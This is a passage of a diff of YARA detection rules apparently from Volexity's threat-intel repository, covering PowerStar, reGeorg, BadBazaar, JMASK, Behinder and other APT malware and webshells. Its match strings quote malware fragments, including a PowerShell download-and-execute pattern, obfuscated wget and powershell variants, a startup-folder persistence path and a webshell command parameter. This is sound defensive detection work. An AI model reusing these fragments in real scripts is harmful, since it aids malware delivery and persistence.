+		$f_7 = "$env:APPDATA+\"\\Microsoft\\Windows\\npv.txt\""
+		$f_8 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\brt8ts74e.bat"
+		$f_9 = "\\Microsoft\\Windows\\s7qe52.txt"
+		$f_10 = "$yeolsoe2 = $yeolsoe"
+		$f_11 = "setRequestHeader(\"Content-DPR\""
+		$f_12 = "getResponseHeader(\"Content-DPR\")"
+		$f_13 = {24 43 6f 6d 6d 61 6e 64 50 61 72 74 73 20 3d 24 53 65 73 73 69 6f 6e 52 65 73 70 6f 6e 73 65 2e 53 70 6c 69 74 28 22 b6 22 29}
+		$f_14 = "$language -like \"*shar*\""
+		$f_15 = "$language -like \"*owers*\""
+		$alias_1 = "(gcm *v????E?P?e*)"
+		$alias_2 = "&(gcm *ke-e*) $Command"
+		$key = "T2r0y1M1e1n1o0w1"
+		$args_1 = "$sem.Close()"
+		$args_2 = "$cem.Close()"
+		$args_3 = "$mem.Close()"
+		$command_1 = "_____numone_____"
+		$command_2 = "_____mac2_____"
+		$command_3 = "_____yeolsoe_____"
 
 	condition:
-		$s
+		2 of ( $s_* ) or any of ( $f_* ) or 2 of ( $alias_* ) or $key or all of ( $args_* ) or any of ( $command_* )
 }
-
-rule VOLEXITY_Apt_Webshell_Aspx_Glasstoken : UTA0178 FILE MEMORY
+rule VOLEXITY_Apt_Win_Powerstar_Logmessage : CHARMINGKITTEN
 {
 	meta:
-		description = "Detection for a custom webshell seen on Exchange server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code."
+		description = "Detects interesting log message embedded in memory only version of PowerStar."
 		author = "threatintel@volexity.com"
-		id = "2f07748a-a52f-5ac7-9d3e-50fd3ecea271"
-		date = "2023-12-12"
-		modified = "2024-09-30"
-		reference = "TIB-20231215"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L26-L52"
+		id = "5979c776-5138-50e2-adab-0793ad86ba76"
+		date = "2023-05-16"
+		modified = "2023-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L66-L79"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "6b8183ac1e87a86c58760db51f767ed278cc0c838ed89e7435af7d0373e58b26"
+		logic_hash = "539c9a8b3de24f2c8058d204900344756a8031822ebebc312612b8fb8422e341"
 		score = 75
-		quality = 30
-		tags = "UTA0178, FILE, MEMORY"
-		hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		quality = 80
+		tags = "CHARMINGKITTEN"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9994
-		version = 6
 
 	strings:
-		$s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii
-		$re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/
+		$s_1 = "wau, ije ulineun mueos-eul halkkayo?"
 
 	condition:
-		for any i in ( 0 .. math.min ( #s1 , 100 ) ) : ( $re in ( @s1 [ i ] .. @s1 [ i ] + 512 ) )
+		all of them
 }
-rule VOLEXITY_Webshell_Aspx_Regeorg : FILE MEMORY
+rule VOLEXITY_Apt_Win_Powerstar_Lnk : CHARMINGKITTEN
 {
 	meta:
-		description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg."
+		description = "Detects LNK command line used to install PowerStar."
 		author = "threatintel@volexity.com"
-		id = "02365a30-769e-5c47-8d36-a79608ffd121"
-		date = "2018-08-29"
-		modified = "2024-01-09"
-		reference = "TIB-20231215"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L53-L86"
+		id = "33f16283-69b9-5109-b723-3ddc8abb8c41"
+		date = "2023-05-16"
+		modified = "2023-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L80-L97"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988"
-		logic_hash = "4fed023e85a32052917f6db1e2e155c91586538938c03acc59f200a8264888ca"
+		logic_hash = "da53aeaf69e80f697068779f4741b8c23cff82dd1bfb0640916a1bcc98c4892f"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		os = "win"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "CHARMINGKITTEN"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 410
-		version = 7
 
 	strings:
-		$a1 = "every office needs a tool like Georg" ascii
-		$a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii
-		$a3 = "exKak.Message" ascii
-		$proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")"
-		$proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii
-		$proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii
-		$proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii
+		$p_1 = "-UseBasicParsing).Content; &(gcm i*x)$"
+		$c_1 = "powershecde43ell.ecde43exe"
+		$c_2 = "wgcde43eet -Ucde43eri"
+		$c_3 = "-UseBasicde43ecParsing).Contcde43eent; &(gcm i*x)$"
 
 	condition:
-		any of ( $a* ) or $proxy1 or all of ( $proxy_b* )
+		any of them
 }
-rule VOLEXITY_Hacktool_Py_Pysoxy : FILE MEMORY
+rule VOLEXITY_Apt_Win_Powerstar_Decrypt_Function : CHARMINGKITTEN
 {
 	meta:
-		description = "SOCKS5 proxy tool used to relay connections."
+		description = "Detects PowerStar decrypt function, potentially downloaded standalone and then injected."
 		author = "threatintel@volexity.com"
-		id = "88094b55-784d-5245-9c40-b1eebf0e6e72"
-		date = "2024-01-09"
-		modified = "2024-01-09"
-		reference = "TIB-20240109"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L87-L114"
+		id = "1fbc2689-8169-53b1-b581-c41ab2b3a16f"
+		date = "2023-05-16"
+		modified = "2023-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L98-L121"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "f73e9d3c2f64c013218469209f3b69fc868efafc151a7de979dde089bfdb24b2"
+		logic_hash = "d022e363464488836a1c161f2b9c7463ac91ae6f60f14dfd574189233201c9aa"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb"
-		os = "all"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "CHARMINGKITTEN"
+		hash1 = "b79d28fe5e3c988bb5aadb12ce442d53291dbb9ede0c7d9d64eec078beba5585"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10065
-		version = 3
 
 	strings:
-		$s1 = "proxy_loop" ascii
-		$s2 = "connect_to_dst" ascii
-		$s3 = "request_client" ascii
-		$s4 = "subnegotiation_client" ascii
-		$s5 = "bind_port" ascii
+		$f_1 = "function Borjol{"
+		$s_1 = "$global:Domain = \""
+		$s_2 = "$global:IP = \""
+		$s_3 = "$global:yeolsoe"
+		$s_4 = "$semii.Close()"
+		$s_5 = "$cemii.Close()"
+		$s_6 = "$memii.Close()"
 
 	condition:
-		all of them
+		any of ( $f_* ) or 2 of ( $s_* )
 }
-rule VOLEXITY_Apt_Malware_Any_Reloadext_Plugin : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Win_Powerstar : CHARMINGKITTEN
 {
 	meta:
-		description = "Detection for RELOADEXT, a Google Chrome extension malware."
+		description = "Custom PowerShell backdoor used by Charming Kitten."
 		author = "threatintel@volexity.com"
-		id = "6c6c8bee-2a13-5645-89ef-779f00264fd9"
-		date = "2024-02-23"
-		modified = "2024-08-02"
-		reference = "TIB-20240227"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L4-L36"
+		id = "febcd23b-6545-571b-905d-18dffe8e913f"
+		date = "2021-10-13"
+		modified = "2023-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-06-28 POWERSTAR/indicators/rules.yar#L122-L150"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "2b11f8fc5b6260ebf00bde83585cd7469709a4979ca579cdf065724bc15052fc"
+		logic_hash = "2cbf59eaee60a8f84b1ac35cec3b01592a2a0f56c92a2db218bb26a15be24bf3"
 		score = 75
 		quality = 80
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "9d0928b3cc21ee5e1f2868f692421165f46b5014a901636c2a2b32a4c500f761"
-		os = "all"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "CHARMINGKITTEN"
+		hash1 = "de99c4fa14d99af791826a170b57a70b8265fee61c6b6278d3fe0aad98e85460"
+		memory_suitable = 1
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10282
-		version = 4
 
 	strings:
-		$man1 = "Reload page with Internet Explorer compatible mode."
-		$man2 = "\"http://*/*\""
-		$code1 = ";chrome["
-		$code2 = "XMLHttpRequest(),_"
-		$code3 = "0x400*0x400"
+		$appname = "[AppProject.Program]::Main()" ascii wide
+		$langfilters1 = "*shar*" ascii wide
+		$langfilters2 = "*owers*" ascii wide
+		$definitions1 = "[string]$language" ascii wide
+		$definitions2 = "[string]$Command" ascii wide
+		$definitions3 = "[string]$ThreadName" ascii wide
+		$definitions4 = "[string]$StartStop" ascii wide
+		$sess = "$session = $v + \";;\" + $env:COMPUTERNAME + $mac;" ascii wide
 
 	condition:
-		all of ( $man* ) or ( #code1 > 8 and #code2 >= 2 and #code3 >= 2 )
+		$appname or all of ( $langfilters* ) or all of ( $definitions* ) or $sess
 }
-rule VOLEXITY_Apt_Malware_Macos_Reloadext_Installer : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Common_Certificate : EVILBAMBOO FILE
 {
 	meta:
-		description = "Detect the RELOADEXT installer."
+		description = "Detection of the common.cer file used for a large BADBAZAAR malware cluster for its certificate pinning for the C2 communication."
 		author = "threatintel@volexity.com"
-		id = "c65ea2b5-ab98-5693-92ea-05c0f1ea1e5b"
-		date = "2024-02-23"
-		modified = "2024-08-02"
-		reference = "TIB-20240227"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L37-L62"
+		id = "5a033770-7ad3-5c79-90ac-b1e3fff6b5f0"
+		date = "2023-06-01"
+		modified = "2023-06-13"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L230-L255"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "8688796839202d95ded15e10262a7a7c7cbbae4a332b60305402e5984005d452"
+		logic_hash = "861d4e1c40847c6ade04eddb047370d645afea6d5c16d55155fa58a16111c39e"
 		score = 75
 		quality = 80
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "07e3b067dc5e5de377ce4a5eff3ccd4e6a2f1d7a47c23fe06b1ededa7aed1ab3"
-		os = "darwin"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405"
+		scan_context = "file"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10281
-		version = 2
 
 	strings:
-		$str1 = "/CustomPlug1n/"
-		$str2 = "Chrome NOT installed."
-		$str3 = "-f force kill Chrome"
-		$str4 = "/*} &&cp -rf ${"
+		$b1 = {30 82 03 61 30 82 02 49 a0 03 02 01 02 02 04 2b 6e df 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b}
+		$s1 = "california1"
+		$s2 = "los1"
+		$s3 = "tech1"
+		$s4 = "common1"
+		$s5 = "common0"
+		$s6 = "220401234506Z"
+		$s7 = "470326234506Z0a1"
 
 	condition:
-		3 of them
+		$b1 at 0 or all of ( $s* )
 }
-rule VOLEXITY_Apt_Malware_Any_Macma_A : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Stage2_Implant_May23 : EVILBAMBOO FILE
 {
 	meta:
-		description = "Detects variants of the MACMA backdoor, variants of MACMA have been discovered for macOS and android."
+		description = "Detection of the second stage capability of the BadBazaar android malware that has the main malicious capabilities. Will gather various info about the user/phone and routinely send this to the C2."
 		author = "threatintel@volexity.com"
-		id = "6ab45af1-41e5-53fc-9297-e2bc07ebf797"
-		date = "2021-11-12"
-		modified = "2024-08-02"
-		reference = "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L63-L111"
+		id = "1f97c610-773f-5385-935a-445cb9192157"
+		date = "2023-05-25"
+		modified = "2023-08-30"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L257-L285"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "7ebaff9fddf6491d6b1ed9ab14c1b87dc8df850536e55aa723d625a593b33ed7"
+		logic_hash = "2186369298ebfa0b892ecb14ebacc93c6d14c9c35012e8e6cdff077634cf3773"
 		score = 75
-		quality = 53
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "cf5edcff4053e29cb236d3ed1fe06ca93ae6f64f26e25117d68ee130b9bc60c8"
-		hash2 = "9b71fad3280cf36501fe110e022845b29c1fb1343d5250769eada7c36bc45f70"
-		hash3 = "623f99cbe20af8b79cbfea7f485d47d3462d927153d24cac4745d7043c15619a"
-		hash4 = "d599d7814adbab0f1442f5a10074e00f3a776ce183ea924abcd6154f0d068bb4"
-		os = "all"
-		os_arch = "all"
-		report1 = "TIB-20231221"
-		report2 = "TIB-20240227"
-		scan_context = "file,memory"
-		severity = "critical"
+		quality = 80
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629"
+		scan_context = "file"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6114
-		version = 9
 
 	strings:
-		$magic1 = "curl -o %s http://cgi1.apnic.net/cgi-bin/my-ip.php" fullword ascii
-		$magic2 = "[FST%d]: WhyUserCancel UNKNOW: %d" fullword ascii
-		$magic3 = "[FST%d]: wait C2 prepare ready TIMEOUT, fd: %d" fullword ascii
-		$magic4 = "[FST%d]: wait C2 ack file content TIMEOUT, fd: %d" fullword ascii
-		$magic5 = "[FST%d]: TIMER_CHECK_CANCEL WhyUserCancel UNKNOW: %d" fullword ascii
-		$magic6 = "[FST%d]: encrypt file info key=%s, crc v1=0x%p, v2=0x%p" fullword ascii
-		$s1 = "auto bbbbbaaend:%d path %s" fullword ascii
-		$s2 = "0keyboardRecirderStopv" fullword ascii
-		$s3 = "curl begin..." fullword ascii
-		$s4 = "curl over!" fullword ascii
-		$s5 = "kAgent fail" fullword ascii
-		$s6 = "put !!!!" fullword ascii
-		$s7 = "vret!!!!!! %d" fullword ascii
-		$s8 = "save Setting Success" fullword ascii
-		$s9 = "Start Filesyste Search." fullword ascii
-		$s10 = "./SearchFileTool" fullword ascii
-		$s11 = "put unknow exception in MonitorQueue" fullword ascii
-		$s12 = "./netcfg2.ini" fullword ascii
-		$s13 = ".killchecker_" fullword ascii
-		$s14 = "./param.ini" fullword ascii
+		$c1 = "%{\"command\":\"%s\",\"path\":\"%s\",\"files\":["
+		$c2 = "{\"name\":\"%s\",\"dirs\":\"%d\",\"files\":\"%d\",\"isfolder\":\"%d\",\"path\":\"%s\"},"
+		$s1 = "Timezon id:"
+		$s2 = "China Telecom"
+		$s3 = "China Unicom"
+		$s4 = "ConfigPipe"
+		$s5 = "ForwordTo"
+		$s6 = "can't get camera content"
+		$s7 = "cat /sys/class/net/wlan0/address"
+		$s8 = "_preferences_light"
+		$s9 = "registration_jid"
 
 	condition:
-		any of ( $magic* ) or 7 of ( $s* )
+		1 of ( $c* ) or 5 of ( $s* )
 }
-rule VOLEXITY_Apt_Malware_Macos_Gimmick : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Apt_Delivery_Web_Js_Jmask_Str_Array_Variant : EVILBAMBOO FILE
 {
 	meta:
-		description = "Detects the macOS port of the GIMMICK malware."
+		description = "Detects the JMASK profiling script in an obfuscated format using a string array and an offset."
 		author = "threatintel@volexity.com"
-		id = "3d485788-4aab-511b-a49e-5dc09d1950a9"
-		date = "2021-10-18"
-		modified = "2024-08-02"
-		reference = "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L112-L170"
+		id = "d5d32c8b-53fb-5103-ac73-05f320e71c97"
+		date = "2023-06-27"
+		modified = "2023-09-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L408-L444"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "00fba9df2212874a45d44b3d098a7b76c97fcd53ff083c76b784d2b510a4a467"
+		logic_hash = "0ae7c96e0f866f21d66d7a23bf937d6ce48c9dd1ea19142dbb13487208780146"
 		score = 75
-		quality = 78
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f"
-		os = "darwin"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		quality = 80
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf"
+		scan_context = "file"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 6022
-		version = 8
 
 	strings:
-		$s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii
-		$json1 = "base_json" ascii wide
-		$json2 = "down_json" ascii wide
-		$json3 = "upload_json" ascii wide
-		$json4 = "termin_json" ascii wide
-		$json5 = "request_json" ascii wide
-		$json6 = "online_json" ascii wide
-		$json7 = "work_json" ascii wide
-		$msg1 = "bash_pid: %d, FDS_CHILD: %d, FDS_PARENT: %d" ascii wide
-		$msg2 = "pid %d is dead" ascii wide
-		$msg3 = "exit with code %d" ascii wide
-		$msg4 = "recv signal %d" ascii wide
-		$cmd1 = "ReadCmdQueue" ascii wide
-		$cmd2 = "read_cmd_server_timer" ascii wide
-		$cmd3 = "enableProxys" ascii wide
-		$cmd4 = "result_block" ascii wide
-		$cmd5 = "createDirLock" ascii wide
-		$cmd6 = "proxyLock" ascii wide
-		$cmd7 = "createDirTmpItem" ascii wide
-		$cmd8 = "dowfileLock" ascii wide
-		$cmd9 = "downFileTmpItem" ascii wide
-		$cmd10 = "filePathTmpItem" ascii wide
-		$cmd11 = "uploadItems" ascii wide
-		$cmd12 = "downItems" ascii wide
-		$cmd13 = "failUploadItems" ascii wide
-		$cmd14 = "failDownItems" ascii wide
-		$cmd15 = "downloadCmds" ascii wide
-		$cmd16 = "uploadFiles" ascii wide
-		$cmd17 = "bash callback...." ascii wide
+		$array_1 = "http://eular.github.io"
+		$array_2 = "stun:stun.services.mozilla.com"
+		$array_3 = "\xE6\x9C\xAA\xE5\xAE\x89\xE8\xA3\x85MetaMask"
+		$array_4 = "/jquery/jquery.min.js"
+		$array_5 = "onicecandidate"
+		$ios_1 = "['a7', '640x1136', [_0x"
+		$ios_2 = "['a7', _0x"
+		$ios_3 = "['a8', _0x"
+		$ios_4 = "['a8', '750x1334', ['iPhone\\x206']]"
+		$ios_5 = "['a8', '1242x2208', ['iPhone\\x206\\x20Plus']]"
+		$ios_6 = "['a8', _0x"
+		$ios_7 = "['a9', _0x"
+		$ios_8 = "['a9', '750x1334', [_0x"
+		$ios_9 = "['a9', '1242x2208', ['iPhone\\x206s\\x20Plus']]"
+		$ios_10 = "['a9x', '2048x2732', ['iPad\\x20Pro\\x20(1st\\x20gen\\x2012.9-inch)']]"
+		$ios_11 = "['a10x', '1668x2224', [_0x"
+		$header = "info = {}, finished = 0x0;"
 
 	condition:
-		$s1 or 5 of ( $json* ) or 3 of ( $msg* ) or 9 of ( $cmd* )
+		3 of ( $array_* ) or 5 of ( $ios_* ) or $header
 }
-rule VOLEXITY_Apt_Malware_Win_Dustpan_Apihashes : STORMBAMBOO FILE
+rule VOLEXITY_Apt_Delivery_Web_Js_Jmask : EVILBAMBOO FILE
 {
 	meta:
-		description = "Detects DUSTPAN malware using API hashes used to resolve functions at runtime."
+		description = "Detects the JMASK profiling script in its minified // obfuscated format."
 		author = "threatintel@volexity.com"
-		id = "ed275da4-cd95-5fa3-a568-e610fb405bb3"
-		date = "2023-08-17"
-		modified = "2024-08-02"
+		id = "a7b653e1-f7c6-56cc-ab99-3de91d29ef3b"
+		date = "2023-06-15"
+		modified = "2023-09-21"
 		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L171-L205"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L446-L472"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "3edb66ade428c451c18aa152244f869f9f8c10e62ed942bf722b4d1cf1893e93"
+		logic_hash = "64315ac05049954d36297a616a25ffdd7ce81c6313c0878d5ba4082da24c21bb"
 		score = 75
 		quality = 80
-		tags = "STORMBAMBOO, FILE"
-		hash1 = "b77bcfb036f5a6a3973fdd68f40c0bd0b19af1246688ca4b1f9db02f2055ef9d"
-		os = "win"
-		os_arch = "all"
-		report1 = "MAR-20230818"
-		report2 = "TIB-20231221"
+		tags = "EVILBAMBOO, FILE"
+		hash1 = "efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30"
 		scan_context = "file"
-		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9591
-		version = 3
 
 	strings:
-		$h1 = {9c 5b 9f 0b}
-		$h2 = {4c 8f 3e 08}
-		$h3 = {b4 aa f2 06}
-		$h4 = {dc cb ca 09}
-		$h5 = {d4 33 07 0e}
-		$h6 = {27 89 d6 0a}
-		$h7 = {b5 7d ae 09}
-		$h8 = {4e 64 eb 0b}
-		$h9 = {be 17 d9 08}
-		$magic = "SMHM"
+		$rev0 = "oi.buhtig.ralue//:ptth" ascii
+		$rev1 = "lairA' xp41" ascii
+		$rev2 = "dnuof ton ksaMateM" ascii
+		$unicode1 = "document[\"\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0053\\u0063\\u0072\\u0069\\u0070\\u0074\"]" ascii
+		$unicode2 = "\\u0061\\u0070\\u0070\\u006c\\u0069\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u002f\\u006a\\u0073\\u006f\\u006e" ascii
+		$unicode3 = "\\u0063\\u006c\\u0069\\u0065\\u006e\\u0074\\u0057\\u0069\\u0064\\u0074\\u0068" ascii
+		$unicode4 = "=window[\"\\u0073\\u0063\\u0072\\u0065\\u0065\\u006e\"]" ascii
+		$header = "(function(){info={};finished=" ascii
 
 	condition:
-		6 of ( $h* ) and $magic
+		all of ( $rev* ) or all of ( $unicode* ) or $header
 }
-rule VOLEXITY_Apt_Malware_Win_Pocostick_Jul23 : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Webshell_Java_Behinder_Shellservice : FILE MEMORY
 {
 	meta:
-		description = "Detects the July 2023 POCOSTICK variant. These strings are only visible in memory after several rounds of shellcode decryption."
+		description = "Looks for artifacts generated (generally seen in .class files) related to the Behinder webshell."
 		author = "threatintel@volexity.com"
-		id = "9632a7fc-06da-58b4-b95c-b46aeb9dd41d"
-		date = "2023-07-24"
-		modified = "2024-08-02"
-		reference = "TIB-20231221"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L206-L235"
+		id = "21c1e3e9-d048-5c60-9c21-8e54b27f359a"
+		date = "2022-03-18"
+		modified = "2024-07-30"
+		reference = "https://github.com/MountCloud/BehinderClientSource/blob/master/src/main/java/net/rebeyond/behinder/core/ShellService.java"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L1-L29"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "19487db733c7f793be2a1287df32a165e46f6af0e940b13b389f4d675b5100c4"
+		logic_hash = "373a8d4ef81e9bbbf1f24ebf0389e7da4b73f88786cc8e1d286ccc9f4c36debc"
 		score = 75
-		quality = 80
-		tags = "STORMBAMBOO, FILE, MEMORY"
-		hash1 = "ec3e787c369ac4b28447e7cacc44d70a595e39d47f842bacb07d19b12cab6aad"
-		os = "win"
+		quality = 30
+		tags = "FILE, MEMORY"
+		hash1 = "9a9882f9082a506ed0fc4ddaedd50570c5762deadcaf789ac81ecdbb8cf6eff2"
+		os = "win,linux"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9542
+		rule_id = 6615
 		version = 3
 
 	strings:
-		$str1 = "Folder PATH listing form volume" wide
-		$str2 = "Volume serial number is 0000-1111" wide
-		$str3 = "Type:Error" wide
-		$str4 = "Type:Desktop" wide
-		$str5 = "Type:Laptop" wide
-		$str6 = "Type:Vitual" wide
-		$str7 = ".unicode.tmp" wide
-		$str8 = "EveryOne" wide
+		$s1 = "CONNECT" ascii fullword
+		$s2 = "DISCONNECT" ascii fullword
+		$s3 = "socket_" ascii fullword
+		$s4 = "targetIP" ascii fullword
+		$s5 = "targetPort" ascii fullword
+		$s6 = "socketHash" ascii fullword
+		$s7 = "extraData" ascii fullword
 
 	condition:
-		6 of them
+		all of them
 }
-rule VOLEXITY_Apt_Malware_Py_Dustpan_Pyloader : STORMBAMBOO FILE MEMORY
+rule VOLEXITY_Malware_Golang_Pantegana : FILE MEMORY
 {
 	meta:
-		description = "Detects Python script used by KPlayer to update, modified by attackers to download a malicious payload."
+		description = "Detects PANTEGANA, a Golang backdoor used by a range of threat actors due to its public availability."
 		author = "threatintel@volexity.com"
-		id = "446d2eef-c60a-50ed-9ff1-df86b6210dff"
-		date = "2023-07-21"
-		modified = "2024-08-02"
-		reference = "TIB-20231221"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L236-L270"
+		id = "b6154165-68e0-5986-a0cf-5631d369c230"
+		date = "2022-03-30"
+		modified = "2025-03-21"
